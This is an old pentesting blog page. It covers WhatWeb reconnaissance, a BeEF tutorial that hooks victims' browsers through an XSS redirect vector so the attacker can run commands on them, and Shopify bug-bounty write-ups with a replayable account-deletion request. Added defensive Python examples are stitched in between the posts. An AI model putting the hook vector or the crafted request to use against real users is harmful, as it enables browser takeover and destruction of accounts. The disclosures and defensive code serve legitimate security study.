
Sunday, December 27, 2015

By
Jitendra
shopify,
Webapp pentesting
Hi CK lovers
Today I am writing a post on information gathering for a website. WhatWeb is a very interesting tool that can be used for information gathering.
What is WhatWeb?
As the name suggests, WhatWeb tells you what a website is built with. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
How to use it:
WhatWeb comes preinstalled on major Linux distributions like BackBox and Kali Linux.
So, to start using it:
1. Open a terminal and type whatweb; it will show you a screen like this
2. Now, to scan a website, simply type whatweb <website>
3. As soon as you give the whatweb command it starts scanning the host, and after scanning it shows output like this
There are many options in this tool which you can use for a wide variety of scans. To see all the available options, just open a terminal and type
whatweb --help
It will show you all the available options for scanning.
More tutorials coming soon
Stay tuned.
Thanks
Jitendra Singh (Team Computer Korner)
Feel Free To Leave A Comment
If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Tuesday, November 10, 2015

By
Jitendra
shopify,
Webapp pentesting
Hi,
Today we will discuss how we can exploit XSS for full system access or for running commands on a victim's computer.
There are two main types of XSS: reflected and stored.
Stored XSS is where we can store the XSS vector permanently on the server, such as in a database or message forum. The malicious script is then executed when a user tries to retrieve the information.
Reflected XSS is where the injected script is reflected off the web server, such as in an error message or search result. Reflected attacks are delivered to victims via some other method, such as an e-mail message or another web site. When a user is tricked into clicking a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.
Let's start exploiting it.
For the exploitation we will use a tool which comes with major Linux distributions, known as the BeEF exploitation framework.
If this tool is not currently installed on your system, give this command in a terminal to install it
>>>sudo apt-get install beef
It will install in seconds and then you are ready to exploit the XSS.
Now open the BeEF UI in your browser. You can type beef in your terminal to find out where the UI is; if you cannot, there is an alternative: BeEF always runs on port 3000, so just check your IP address with the command
>>> ifconfig
Copy the IP address and visit this link
Your_Ip_address:3000/ui/panel
It will take you to the login panel of BeEF, which looks like this
The default username:password is beef:beef
Log in and it will take you to this page
Here click where I have marked with a small arrow
It will take you to a URL like this
Your_ip_add:3000/demos/butcher/index.html
Copy this and create an XSS vector like this
<script>window.location="YoUr_url"</script>
Now store this XSS vector, or if you are exploiting a reflected XSS, shorten the whole URL using any URL shortening service like bit.ly
After storing the XSS, or in the reflected case when the user clicks the XSS vector link,
it will show you his IP address and plenty of information about his browser and PC,
like this
Now click on the command section and you can run commands on the victim's computer.
Now you can do what you want.
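As an added defender-side example (not code from the original post), here is the rendering bug that lets a stored vector like the one above execute, beside the output encoding and Content-Security-Policy that neutralise it; the rendering helpers and the header value are assumptions, not any real site's code.

```python
import html
import re

# Constructed sample: the stored-XSS vector shown in the post, as it would be
# submitted in a comment or forum message ("YoUr_url" is the post's placeholder).
HOOK_VECTOR = '<script>window.location="YoUr_url"</script>'

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_comment_unsafe(text: str) -> str:
    """The vulnerable pattern: untrusted text concatenated straight into HTML,
    so a stored vector is served to every visitor as live markup."""
    return '<div class="comment">' + text + "</div>"


def render_comment_safe(text: str) -> str:
    """Hardened output: HTML-encode every untrusted value before it reaches the
    page. html.escape rewrites < > & " ' as entities, so the browser displays
    the vector as text instead of executing it."""
    return '<div class="comment">' + html.escape(text, quote=True) + "</div>"


def csp_header() -> str:
    """Defence in depth (assumed policy): refuse inline scripts and off-site
    script sources, so even an un-escaped <script> block would not run and the
    redirect to the hook page could not happen."""
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"


def contains_active_script(rendered: str) -> bool:
    """Regression check for tests or a response monitor: does the rendered
    markup still carry a live <script> tag after the escaping step?"""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    for renderer in (render_comment_unsafe, render_comment_safe):
        out = renderer(HOOK_VECTOR)
        state = "LIVE SCRIPT" if contains_active_script(out) else "inert"
        print(renderer.__name__, "->", state, out)
```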
Hope you enjoyed this post; if you have any suggestions please let me know.
Feel free to comment.
Thanks
Jitendra K Singh and Sooraj Shekhar
Hi CK lovers
Today I am sharing how I bypassed the password requirement for closing a shop on a Shopify trial account.
Shopify requires a password for closing a shop, and once you have closed the shop you have to buy a plan to reopen it.
So if you navigate to Account > Close shop, it asks for a password to close it.
After entering the password it takes a survey on why I closed my shop, and after that survey the shop is deleted.
But after submitting the survey a plain request goes out, without a password, to delete the account.
There is no validation there.
The request looks like this
POST /admin/account HTTP/1.1
Host: testingdeletion.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://testingdeletion.myshopify.com/admin/settings/general
Cookie: <redacted>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
utf8=%E2%9C%93&method=delete&authenticity_token=91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D&cancelreason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing
You can see method=delete in this request, but there is no password validation here, so I can grab an authenticity token by saving any of my account details and capturing the request with Burp, then craft this request using my cookie and forward it; it deletes the account without any password requirement.
You can find more details here: https://hackerone.com/reports/93901
This issue is now patched, and they awarded me $500 for reporting it.
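An added illustration (not Shopify's code) of the missing check the post describes: a handler that parses the request body above and deletes on method=delete with nothing but a valid CSRF token, beside one that re-verifies the password before the destructive step; the account, session and password hashing are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed copy of the request body from the post (same fields and token as shown there).
BODY = (
    "utf8=%E2%9C%93&method=delete&authenticity_token="
    "91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D"
    "&cancelreason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing"
)
SALT = b"constructed-salt"  # hypothetical per-account salt


def hash_password(password: str) -> bytes:
    # PBKDF2 stand-in for whatever the real site stores; iteration count kept low for the demo.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 50_000)


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


# Hypothetical shop account and the session that issued the authenticity token.
ACCOUNT = {"password_hash": hash_password("correct horse"), "deleted": False}
SESSION = {"csrf": parse_form(BODY)["authenticity_token"]}


def close_shop_vulnerable(body: str, session: dict, account: dict) -> str:
    """The behaviour the post describes: the survey's follow-up POST carries
    method=delete and a valid CSRF token, and that alone deletes the shop."""
    form = parse_form(body)
    if not hmac.compare_digest(form.get("authenticity_token", ""), session["csrf"]):
        return "csrf_rejected"
    if form.get("method") == "delete":
        account["deleted"] = True
        return "deleted"
    return "updated"


def close_shop_hardened(body: str, session: dict, account: dict) -> str:
    """Fix: the destructive step re-verifies the password in the same request,
    so a replay built only from a valid cookie and CSRF token is refused."""
    form = parse_form(body)
    if not hmac.compare_digest(form.get("authenticity_token", ""), session["csrf"]):
        return "csrf_rejected"
    if form.get("method") == "delete":
        supplied = hash_password(form.get("current_password", ""))
        if not hmac.compare_digest(supplied, account["password_hash"]):
            return "password_required"
        account["deleted"] = True
        return "deleted"
    return "updated"
```

The CSRF token still matters (it stops a third party driving the request), but on its own it proves nothing about who is sitting at the keyboard, which is why the hardened handler asks for the password again.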
Thanks
Jitendra K Singh (Team Computer-Korner)

Saturday, September 19, 2015

By
Jitendra
shopify,
Vulnerability
Hi dear followers
Shopify launched their bug bounty program on HackerOne.
This post is about a bug on Shopify: a privilege escalation involving invited users. Any user who has full access to a shop can also claim the accounts of invited users and use them for spoofing against the shop owner and the invited users.
There are two options to invite users:
1. The shop owner can invite them; the invited users receive a link at their email address and, after clicking on the link, can create their account.
2. The shop owner can create the account on their behalf and then provide them with the email and password.
One more thing: only the shop owner can invite users.
So the second option can only be done by the person who is the shop owner.
Suppose there are three users A, B and C. A is the shop owner, B is a user who has full access to the shop, and C is a user invited by A. Now B logs into his account, navigates to Settings > General and the invited users link; the invited user C's link looks like this
C- Invited
Now click on Invited and B can create the account on behalf of user C. After B creates an account on behalf of C, shop owner A's settings will show him that the account has been claimed by the user he invited, which is C.
Now B can use C's account for doing malicious things to the shop, and the shop admin will think that this was done by C.
This is privilege escalation against C and also against the shop owner, because as I described before only the shop owner can invite and create accounts on behalf of invited users.
They have now fixed the bug so that only the shop owner can access the Invited and Joined tabs on their Shopify account.
Shopify awarded me a bounty of $500 for reporting this bug.
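Added example, not Shopify's code, of the authorisation check at the centre of this bug: the Invited tab gated on having full access (so B can claim C) beside the fix that gates it on being the shop owner; the User and Shop models and the scenario runner are constructed assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional

# Hypothetical models for the scenario in the post: shop owner A, full-access
# staff member B and invited user C (constructed, not Shopify's data model).
@dataclass
class User:
    name: str
    role: str                          # "owner", "staff_full_access", "invited", "joined"
    claimed_by: Optional[str] = None   # who created the account for an invitee

@dataclass
class Shop:
    owner: str
    audit: list = field(default_factory=list)

def claim_invite_vulnerable(actor: User, shop: Shop, invitee: User) -> str:
    """Behaviour the post describes: the Invited/Joined tab is gated on having
    full access, so staff member B can create C's account on C's behalf."""
    if actor.role not in ("owner", "staff_full_access"):
        return "forbidden"
    if invitee.role != "invited":
        return "not_invited"
    invitee.claimed_by, invitee.role = actor.name, "joined"
    # The owner's view only shows the invitee as claimed, which is what makes
    # B's later actions under C's account look like C's.
    shop.audit.append(f"{invitee.name} claimed")
    return "claimed"

def claim_invite_fixed(actor: User, shop: Shop, invitee: User) -> str:
    """Fix as described in the post: only the shop owner may act on invited
    users. The check is against the shop record, not a role label the actor
    carries, and the audit line records who performed the claim."""
    if actor.name != shop.owner:
        return "forbidden"
    if invitee.role != "invited":
        return "not_invited"
    invitee.claimed_by, invitee.role = actor.name, "joined"
    shop.audit.append(f"{invitee.name} claimed by {actor.name}")
    return "claimed"

def scenario(claim) -> Dict[str, object]:
    """Run the A/B/C scenario from the post through one claim implementation."""
    shop = Shop(owner="A")
    a, b, c = User("A", "owner"), User("B", "staff_full_access"), User("C", "invited")
    by_b = claim(b, shop, c)   # full-access staff member tries to claim C first
    by_a = claim(a, shop, c)   # then the owner tries
    return {"by_B": by_b, "by_A": by_a, "claimed_by": c.claimed_by, "audit": shop.audit}
```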
Hope you enjoyed this post.
Feel free to comment; questions are welcome.
Thanks
Jitendra K Singh and the whole Computer Korner and I-HOS team.